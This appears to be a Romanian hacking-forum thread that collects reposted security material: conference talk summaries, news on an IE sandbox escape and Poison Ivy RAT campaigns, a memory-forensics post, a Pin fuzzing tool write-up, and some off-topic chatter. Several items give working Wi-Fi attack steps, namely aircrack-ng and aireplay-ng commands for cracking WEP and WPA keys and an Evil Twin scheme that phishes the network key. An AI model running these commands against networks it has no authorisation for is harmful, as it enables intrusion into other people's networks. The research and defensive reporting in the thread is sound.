Nytro

Da, versiunea pentru n00bi

[h=1]Hacking WPA 2 Key - Evil Twin Method (No Bruteforce)[/h] In an ealier post, we've seen how to crack WPA-2 network keys using a dictionary. While that technique works, it could take an awful long time, especially when brute forcing. On this technique, named 'Evil Twin', we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point - which looks exactly like his. When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually. For this example I created a service page, started apache and mysql to store the keys typed in a database. Song: BGNS - Sasas ARTICLE & FILES: http://technicdynamic.com/2011/12/hac... Check out my recommended wireless adapters!: http://www.technicdynamic.com/store/#... ---------- This video was produced in experimental laboratories under controlled circumstances; You can use these techniques only where you are authorized to do so legally. The author and/or contributors will not take responsibility for the viewer's actions.

[h=1]Hacktivity 2012 - Vivek Ramachandran - Cracking WPA/WPA2 Personal and Enterprise for Fun and Profit[/h] https://www.hacktivity.com/ In this talk, we will explore the bleeding edge techniques used to compromise and break into WPA/WPA2 networks - both Personal and Enterprise! We will cover attacks on PSK, Hole 196, WPS, WPA/WPA2 Enterprise. You will learn how to create honeypot and MITM attacks setups for PSK, PEAP, EAP-TTLS etc. and to leverage the cloud to crack WPA handshakes and break MS-CHAPv2 which is the inner authentication protocol for most PEAP and EAP-TTLS networks. You will walk away with all the knowledge you need to secure into most Enterprise Wi-Fi networks!

[h=1]How to crack a WPA encypted wifi Network with Backtrack 5[/h] Please donate any amount of money to my paypal which is kivi12k@aol.com This is a tutorial on how to crack a WPA encrypted password. This information should only be used for education purposes. Steps: 1)airmon-ng 2)airmon-ng start wlan0 3)airodump-ng mon0 4)airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0 5)aireplay-ng -0 5 -a (bssid) mon0 6)aircrack-ng (filename)*.cap -w (dictionary location) If you need any help feel free to PM me or shoot me an instant message, a donation would also be appreciated. You can instant message me at: AIM - kivi12k@aol.com WINDOWS MESSENGER - kivi12k@hotmail.com YAHOO MESSENGER - kivi12k@ymail.com

[h=1]PacSec 2011 Eric Filiol - Dynamic Cryptographic Backdoors to take over the TOR network[/h] secwest - World Emerging Security Technology. Video from PacSec, November 2011, Tokyo, Eric Filiol outlines potential threats to the TOR anonymity network from compromised cryptographic functions. (Reminder: the CanSecWest 2012 Call for Papers closes next week. See CanSecWest Applied Security Conference: Vancouver, British Columbia, Canada)

[h=1]DEFCON 2012 - Hacking Smart Meters[/h]DEFCON 2012 - Hacking Smart Meters - Part 1 of 5: DEFCON 2012 - Hacking Smart Meters - Part 2 of 5: DEFCON 2012 - Hacking Smart Meters - Part 3 of 5: DEFCON 2012 - Hacking Smart Meters - Part 4 of 5: DEFCON 2012 - Hacking Smart Meters - Part 5 of 5: "Looking Into the Eye of the Meter - When you look at a Smart Meter, it practically winks at you. Their Optical Port calls to you. It calls to criminals as well. But how do criminals interact with it? We will show you how they look into the eye of the meter. More specifically, this presentation will show how criminals gather information from meters to do their dirty work. From quick memory acquisition techniques to more complex hardware bus sniffing, the techniques outlined in this presentation will show how authentication credentials are acquired. Finally, a method for interacting with a meter's IR port will be introduced to show that vendor specific software is not necessary to poke a meter in the eye."

[h=1]DEFCON 19: Hacking Google Chrome OS (w speaker)[/h] Speakers: Kyle 'Kos' Osborn Application Security Specialist, WhiteHat Security | Matt Johanson Application Security Specialist, WhiteHat Security Google recently announced Chrome OS powered computers, called Chromebooks, at Google I/O and the company is getting ready to market them to businesses as well as consumers. What's different about Chrome OS and Chromebooks, other than the entire user-experience taking place exclusively in a Web browser (Google Chrome), is everything takes place in the cloud. Email, document writing, calendaring, social networking - everything. From a security perspective this means that all website and Web browser attack techniques, such as like Cross-Site Scripting, Cross-Site Request, and Clickjacking, have the potential of circumventing Chrome OS's security protections and exposing all the users data. Two members of the WhiteHat Security's Threat Research Center, Matt Johansen and Kyle Osborn, have spent months hacking away on Google's Cr-48 prototype laptops. They discovered a slew of serious and fundamental security design flaws that with no more than a single mouse-click may victimize users by: • Exposing of all user email, contacts, and saved documents. • Conduct high speed scans their intranet work and revealing active host IP addresses. • Spoofing messaging in their Google Voice account. • Taking over their Google account by stealing session cookies, and in some case do the same on other visited domains. While Chrome OS and Chromebooks has some impressive and unique security features, they are not all encompassing. Google was informed of the findings, some vulnerabilities were addressed, bounties generously awarded, but many of the underlying weaknesses yet remain -- including for evil extensions to be easily made available in the WebStore, the ability for payloads to go viral, and javascript malware survive reboot. With the cloud and web-based operating systems poised to make an impact on our computing future, Matt and Kyle ready to share all their never-before-seen research through a series of on-stage demonstrations. For more information visit: DEF CON

[h=1]Shmoocon 2013: Wipe The Drive!!! - Techniques For Malware Persistence[/h] For more information and to download the video visit: ShmooCon 2013 - February 15-17 - ShmooCon 2013 Playlist Shmoocon 2013: Shmoocon 2013 - YouTube Speakers: Mark Baggett | Jake Williams Let's face it: sooner or later you will be owned. As a security professional, you (should) know that the best plan is to format the system drive, reinstall the operating system, and start over. But management has another plan. They know that rebuilding infrastructure from scratch involves costly downtime. The temptation to remove the obvious malware and declare the system clean is strong. In session, we'll demonstrate eight less than obvious techniques that can be used to install secondary persistence techniques on a compromised Windows system. The point of the session is not to address specific techniques that can be used as secondary persistence mechanisms for malicious actors. The idea is to conclusively demonstrate that techniques of this type exist that hide deep in the registry and other system settings. We will show that these techniques hide even from memory forensics, the holy grail of "clean system" confirmation. Not that we consider it a substitute for formatting and re-installing the operating system, but we will be releasing a script that checks for the use of these specific techniques.

[h=3] [/h][h=1]Mohamad Yaich [/h][h=1]Buffer Overflow Primer Part 1 (Smashing the Stack)[/h] [h=1]Buffer-Overflow-Primer-Part-2-(Writing-Exit-Shellcode)[/h] [h=1]Buffer-Overflow-Primer-Part-3-(Executing-Shellcode)[/h] [h=1]Buffer Overflow Primer Part 4 (Disassembling Execve)[/h] [h=1]Buffer-Overflow-Primer-Part-5-(Shellcode-for-Execve)[/h] [h=1]Buffer-Overflow-Primer-Part-6-(Exploiting-a-Program)[/h] [h=1]Buffer-Overflow-Primer-Part-7-(Exploiting-a-Program-Demo)[/h] [h=1]Buffer-Overflow-Primer-Part-8-(Return-to-Libc-Demo)[/h] Sursa: https://www.youtube.com/user/TunisiaViP/videos?sort=p&view=0&shelf_index=1

Andrew Whitaker [h=1]SEH Exploits Part 1[/h] [h=1]SEH Exploits Part 2 of 2[/h] SEH Exploit using Python, Ollydbg, SafeSEH Plug-in, and Metasploit.

[h=1]Cracking WPA2[/h] Andrew Whitaker Cracking WPA2 using Airmon-ng

Am mai gasit asta: Image Host | Free web hosting for images with direct linking allowed. Use IMG Host to share pictures with friends or to post images on message boards, your MySpace profile or eBay auction. - Simplu. Daca mai aveti alternative, postati aici, sa avem de unde alege.

Test: Cautam un site unde sa pot uploada imagini si sa am si eu link direct, nu ca jegul de tinypic care imi cere si CAPTCHA si care nu imi da link direct. Am gasit asta: http://www.pixentral.com Pentru link direct, click dreapta, copy image location. Simplu si eficient. Muie tinypic. PS: Limitari: - maxim 2 MB - maxim 30 de zile

La multi ani ba, ziceai ca dai de baut

Jumping Out of IE’s Sandbox With One Click by Dennis Fisher Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft’s August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security Update for Internet Explorer. But hidden inside the big fix was a patch for a vulnerability that enabled a one-click escape of the IE sandbox. The vulnerability was discovered by researcher Fermin J. Serna, a former Microsoft security engineer, and it takes advantage of the way that IE handles some command line options in certain conditions. Serna found that the ElevationPolicy in IE will treat the Microsoft Diagnostic Tool (msdt.exe) as a medium-integrity process if the user requests it to do so. In IE, Protected Mode is the sandbox that is designed to prevent attackers from being able to use one bug in a low-level process to compromise the machine. “Funny thing is that CreateProcess() has a hook inside the LowIL IE process and if you try to CreateProcess(“msdt.exe”) it will get brokered to the IE Medium IL one and applied the Elevation policy there. Some sanitization happens to most of the parameters for security reasons (do not create a Medium IL process where the process token is too unrestricted),” Serna wrote in a blog post explaining the bug. “The vulnerability here is that msdt.exe (that due to its elevation policy will run as medium IL outside of any sandbox) has some interesting command line options. Concretely this one: /path .diagpkg file | .diagcfg file —- Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameter.” Serna said that using the vulnerability, he could cause the msdt.exe process to display some strings that he controls to the user. If the user clicks the continue button on the dialog box, his code will run and he’s escaped the sandbox in the browser. He said that executing the attack would be trivial under the right conditions. “Assuming you have code execution at the sandboxed process though some other bug (let’s say the common use after free problem all browsers suffer) then it is not easy but trivial. This sandbox escape vulnerability is not a memory corruption that can fail but a logical one that does not fail. The only requirement is the attacked user has to click a “continue” button on a dialog with attacker controlled messages. This is the reason for a one click versus a full 0 click where the user does not see anything,” Serna said via email. Sursa: Jumping Out of IE's Sandbox With One Click | Threatpost

How to Crack WEP Key With Backtrack 5 [wifi hacking] As announced before we would be writing related to wifi attacks and security, This post is the second part of our series on wifi attacks and Security, In the first part we discussed about various terminologies related to wifi attacks and security and discussed couple of attacks. This post will also show you how one can easily crack WEP keys in no time. Security Issues With WEP WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol itself has some weakness which allows the attackers to crack them in no time. The biggest flaw probably in a WEP key is that it supports only 40bit encryption which means that there are 16million possibilities only. For more information on WEP flaws, kindly read the WEP flaws section here. Requirements :- Here is what you would require to crack a WEP key: 1. Backtrack or any other Linux distro with aircrack-ng installed 2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack You can find compatible wifi card lists here. Procedure :- First Login to your Backtrack / Linux and plug in your Wifi adapter Open a new Console and type in the following commands : ifconfig wlan0 up where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ". Putting your WiFi Adapter on Monitor Mode To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands airmon-ng start (your interface) Example :- airmon-ng start wlan0 Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown Finding a suitable Target After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command airodump-ng mon0 Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type. Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial Attacking The Target Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands airodump-ng mon0 --bssid -c (channel ) -w (file name to save ) As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP" airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP Using Aireplay to Speed up the cracking Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets . In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands aireplay-ng - 1 3 -a (bssid of the target ) (interface) In our case we enter the following commands aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface) In our case we enter aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0 If this step was successful you'll see Lot of data packets in the airodump capture as shown Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal Cracking WEP key using Aircrack Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key aircrack-ng (name of the file ) In our case we enter aircrack-ng RHAWEP-0.1-cap With in a few minutes Aircrak will crack the WEP key as shown Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key. Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments Sursa: Learn everything about window,hacking,buy e-gift vouchers

Poison Ivy RAT Spotted in Three New Attacks by Michael Mimoso The Poison Ivy remote access Trojan may be old, but it’s not losing favor with nation states that continue to make it the center piece of targeted attacks. Three groups of hackers, reportedly all with ties to China and possibly related in terms of their funding and training, are currently managing campaigns using the RAT to steal data from organizations and monitor individuals’ activities. Researchers at FireEye said the three campaigns target different industries yet share some of the same builder tools, employ passwords written in the same semantic pattern, and use phishing emails in their campaigns that are written in English using a Chinese language keyboard. So much for the notion of targeted, persistent attacks requiring zero-day malware. “There is a noticeable infrastructure built around using this tool; it’s clear they’ve trained a number of people to use and operate it,” said Darien Kindlund, manager of threat intelligence at FireEye. “It’s effective and there’s no need to change their tactics, which is why they’re still using it.” Kindlund said, however, that enterprise security managers and operations teams can become complacent when it comes to Poison Ivy, dismissing it as a crimeware tool and missing its potential to still infect many machines as it moves laterally looking for more vulnerable machines or data it targets. “What’s easy for these threat actors is they’re using easy-to-use tools that are point-and-click and it becomes easy to blend in with crimeware groups, easy to blend into the noise and discount their presence when a defender identifies a Poison Ivy infection,” Kindlund said. “They might remediate a single infected machine rather than think it’s one of 50 compromises and a large-scale infection. That gives the adversary more time to change tactics and move laterally to other systems, making it harder to detect.” Another reason Poison Ivy still finds favor with attackers is that, unlike Gh0stRAT or Dark Comet, it’s difficult to detect when Poison Ivy beacons out to its command and control infrastructure in order to receive more instructions. “Compared to Gh0stRAT, which uses zlib compression to obfuscate communication out, if a network operator sees that traffic beaconing out, it’s easy to decode that traffic to figure out what walked out door,” Kindlund said. “Poison Ivy uses Camellia encryption, which makes it more difficult to figure out what walked out the door.” The three attacks currently are fundamentally familiar. The first, named admin@338 for the password used by the attacker, targets international financial firms that specialize in the analysis of global or country-specific economic policies. It uses malicious email attachments to infect endpoints with Poison Ivy, which then downloads additional malware to steal intelligence in order to monetize insider information to make a market play or for geo-political reasons, Kindlund said. The second attack, named th3bug for its password, spiked last year, FireEye said. It focuses on higher education and international health care and high tech firms in order to steal intellectual property or new research that has yet to be published by a university team. Most of these are watering hole attacks where a regional website frequented by the targets is compromised and exploit code is injected onto the victim’s machine that redirects them to Poison Ivy. The third attack, dubbed menuPass, has been the most active of the three and dates back to 2009, spiking last year. It targets the defense industry and international government agencies trying to steal military intelligence. Spear phishing campaigns include attachments infected with Poison Ivy that are meant to look like a purchase order or price quote that would be fairly specific to the victim, Kindlund said. “They’ve done their homework and looked at the trust relationships of the target—who does this defense contractor do business with—and spoof an email from that partner and send an email through that channel,” Kindlund said. “These three groups have ties back to China; they all use a separate command and control infrastructure, but all three have a backend presence in that country.” Meanwhile, the company is releasing a free tool based on the open source ChopShop kit developed by MITRE Corp. The module is Poison Ivy specific, similar to other modules built for Gh0stRAT and will allow a security or network operations person to decode Poison Ivy traffic. *Poison Ivy image via uwdigitalcollections‘ Flickr photostream, Creative Commons Sursa: Poison Ivy RAT Spotted in Three New China Attacks | Threatpost Old schooleri

Frauda

http://suport.romtelecom.ro/app/answers/detail/a_id/90/~/cum-pot-apela-1930---v%E3%A2nz%E4%83ri-%E5%9Fi-rela%E5%B3ii-cu-clien%E5%B3ii-din-str%E4%83in%E4%83tate%3F http://www.romtelecom.ro/termeni-legali/termeni-si-conditii-myaccount http://economie.hotnews.ro/stiri-telecom-7174542-cum-ajung-abonatii-romtelecom-clienti-fara-voie-societatii-asigurari-astra.htm

Inside the Mind of a Famous Hacker When he was just 15 years old, Michael “MafiaBoy” Calce managed to shut down several major websites including CNN, Dell, Amazon, Yahoo!, eBay, and E-Trade with a series of denial of service attacks. Now, more than a decade later, he talks about how the hacker culture has changed and what users can do to protect themselves. How He Toppled the Web Giants In 2000, Calce targeted CNN.com after another hacker claimed the site would be impossible to bring down because of its “advanced networks” and “huge traffic numbers.” He managed to slow down CNN’s site for nearly two hours . Denial of service attacks involve bombarding a site or application with so many requests that the server is unable to keep up. Calce modified a denial of service attack written by another hacker and trained approximately 200 university networks under his control to a specific target. The attack against Yahoo! was by accident, Calce said. He had put in the IP addresses into the script, and then gone to school, forgetting the script was still running. He came home to find his computer had crashed, and didn’t realize what had happened until he heard the news reports later. Calce’s activities were “illegal, reckless and, in many ways, simply stupid,” he said, adding that he really had not understood the consequences of his actions. “It’s So Easy It’s Scary” More than a decade later, it’s easier to launch attacks now than it was then, Calce said. A lot of the companies are completely unaware that they are at risk, and that needs to change. Back when he was actively targeting sites, you had to work and build your own arsenal of tools before launching an attack. Now there are hacker desktops and ready-to-go tools that anyone can download, install, and go. “If you’re interested and you want to be a hacker, you can be a hacker in 30 minutes,” Calce said. Different Mentality, Motivations Calce and his fellow hackers were driven by curiosity and desire to understand how things worked. That is where the term “hacker” originated, after all. A hacker refers to anybody interested in manipulating technology to do something other than its original purpose. “That’s not necessarily a bad thing,” Calce said. “Everyone at that point in time was running tests and seeing what they could do and what they could infiltrate,” Calce said. The current generation is motivated by money, or desire to destroy. “It’s much more about monetary gain, whereas we were pushing the status quo,” Calce said. And even when there doesn’t seem to be an obvious financial motive, that doesn’t mean it isn’t there. Hacktivist groups such as “Anonymous” and “Lulzsec” are a “different breed,” Calce said. While they have political motivations, some of them do have malicious goals. They are not pure white-hat, or pure black-hat, but more grey-hat hackers Calce said. There will be more hacktivism since people have figured out how to use technology to fight back and draw more attention to their cause. “I don’t condone what they’re doing, but I understand their point,” Calce said. Safe Security Online With attack motivations shifting to monetary gain, the attack focus has also shifted, and individual users are just as likely to be targeted as large companies. Users need to use strong passwords to protect their accounts. They need to be long and complex. Password managers help keep track of strong passwords, Calce said. They should also think about installing personal firewall software on their computers to block malicious traffic. A firewall can also warn you when an application is trying to access the Internet. If you are not using Bluetooth, it should be turned off so that other devices cannot connect to your computer. And finally, users should beware of open wireless networks because it is incredibly easy to eavesdrop on what you are doing, and people don’t realize this, Calce said. Hacking will never go away, and users can take some steps to protect themselves, but ultimately, organizations need to invest in security to protect their end users, Calce said. Sursa: Inside the Mind of a Famous Hacker | ZoneAlarm Security Blog

[h=1]Web Framework Vulnerabilties - Abraham Kang[/h] from OWASP AppSec USA PRO 8 months ago not yet rated Title: Web Framework Vulnerabilities Abstract This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understand of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. ***** Date: Friday October 26, 2012 3:00pm - 3:45pm Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel. Track: Attack Sursa: Web Framework Vulnerabilties - Abraham Kang on Vimeo

[h=1]Visualizing Recovered Executables from Memory Images[/h]jessekornblum (jessekornblum) wrote, I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using 2008: This post will explain what's happening in that picture—how PE executables are loaded and recovered—and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process. When executables are loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections needs to page aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions. When we recover executables from memory, we can use the PE header to map the sections back to their size and locations as they were on the disk. Generally memory forensics tools don't undo the other modifications made by the Windows loader. The changes made in memory remain the new version we recover. In addition, due to paging and other limitations we don't always get all of the pages of the executable from memory. They could have been paged out, are invalid, or were never loaded in the first place. That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations for an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image. In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated gifs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256. Here's a representation of the original executable from the disk as produced with colorize. This image is a little different than some of the others I've posted before. Instead of being vertically oriented, it's horizontal. The data starts at the top left, and then goes down and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture: $ colorize -o -w 512 cmd.exe and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory aligned, not disk aligned. Here's the command line to run the plugin: $ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe Here's how we can colorize it: $ mv executable.3256.exe executable-procmemdump.3256.exe $ colorize -o -w 512 executable-procmemdump.3256.exe Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp There's a lot going on here, but things will get more clear with a third image. For the third picture we'll recover the executable again, but this time realigning the sections back to how there were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when it was loaded. We can do this using the procexedump plugin, like this: $ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe We repeat the process for colorizing this sample: $ mv executable.3256.exe executable-procexedump.3256.exe $ colorize -o -w 512 executable-procexedump.3256.exe Which produces this image: http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different: $ md5deep -b cmd.exe executable-procexedump.3256.exe eeb024f2c81f0d55936fb825d21a91d6 cmd.exe ff8a9a332a9471e1bf8d5cebb941fc66 executable-procexedump.3256.exe Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]: $ ssdeep -bda cmd.exe executable-procexedump.3256.exe executable-procexedump.3256.exe matches cmd.exe (66) There's also a match with the sdhash similarity detection tool [5]: $ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe cmd.exe|executable-procexedump.3256.exe|046 (You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.) Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures. Combined with some annotations on the pictures, here's the result: There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?) The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together. We can compare the two files at the byte level and then colorize the result: $ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat $ colorize -o - w 512 orig-to-exe.dat Here's the result: http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, and the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image--hence the speckled pattern. The changes to the executable you can clearly see a pattern of dashed red lines. Finally, we can visualize the changes between the in-memory representation of the file and the disk representation the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump: The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, being added by the Windows loader to page align the first section of the executable. [h=3]References[/h][1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon. Jesse Kornblum is not sponsored or approved by, or affiliated with Verizon.[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF. [3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project. [4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep. [5] Vassil Roussev, sdhash, http://sdhash.org/. Sursa: jessekornblum: Visualizing Recovered Executables from Memory Images

In-Memory fuzzing with Pin by Jonathan Salwan - 2013-08-17 In my previous blog post, I talked about the taint analysis and the pattern matching with Pin. In this short post, I will always talk about Pin, but this time about the In-Memory fuzzing. 1 - In-Memory fuzzing 1.1 - Little introduction In-Memory fuzzing is a technique which consists to target and test a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code, this is mainly used for a quick analysis. However it's really straightforward to implement it. For that, we just need to : Choose a targeted piece of code. Set a breakpoint before and after our targeted area. Save the execution context when the first breakpoint occurs. Restore the execution context when the second breakpoint occurs. Catch the SIGSEGV signal. Repeat the operation 3 and 4 until the crash occurs. 1.2 - Little example For a little example, see the following graph. Now, imagine that the user can control the first argument, that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested to test the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", that means we can control the eax register. So, we will apply the In-Memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions and we will fuzz the eax register. Use the Pin API The Pin API provides all what we need to apply the In-Memory fuzzing technique. To catch the signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like that: PIN_InterceptSignal(SIGSEGV, catchSignal, 0); Our call back catchSignal, displays just the current context when the signal occurs. Then, because Pin is a DBI framework (Dynamic Binary Instrumentation), we can't set a breakpoint, but that's not really important. With a DBI framework we can control each instruction before and after their execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instruction occurs. A CONTEXT in Pin, is just the registers state of the processor. That means, when you call PIN_SaveContext(), you save only the state of registers, not the memory. So, to monitor the STORE access, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value and we restore it when the context is restored. That's all, we can see the full source code here. In-Memory fuzzing Pin tool This Pin tool requires three arguments and can take three optional arguments. Required -------- -start <address> The start address of the fuzzing area -end <address> The end address of the fuzzing area -reg <register> The register which will be fuzzed Optional -------- -startValue <value> The start value -maxValue <value> The end value -fuzzingType <"inc" | "random"> Type of fuzzing: incremental or random If we take the above example and that we want to fuzz the orange basic block, we have something like that: $ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \ -startValue 1 -maxValue 0x3000 -- ./test 1 > dump [2] 8472 segmentation fault 0.53s user 0.20s system 99% cpu 0.729 total I used the "time" command to show you how Pin is efficient - I've also redirected stdout in a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs - Current RIP = 0x4005a5 "movzx eax, byte ptr [rax]" with RAX = 0x2420. [Restore Context] [Save Context] [CONTEXT]=---------------------------------------------------------- RAX = 0000000000002420 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005a5 +------------------------------------------------------------------- +--> 4005a5: cdqe +--> 4005a7: add rax, qword ptr [rbp-0x10] +--> 4005ab: movzx eax, byte ptr [rax] /!\ SIGSEGV received /!\ [SIGSGV]=---------------------------------------------------------- RAX = 00007fff3134d000 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005ab +------------------------------------------------------------------- You can download this Pin tool here. Sursa: shell-storm | In-Memory fuzzing with Pin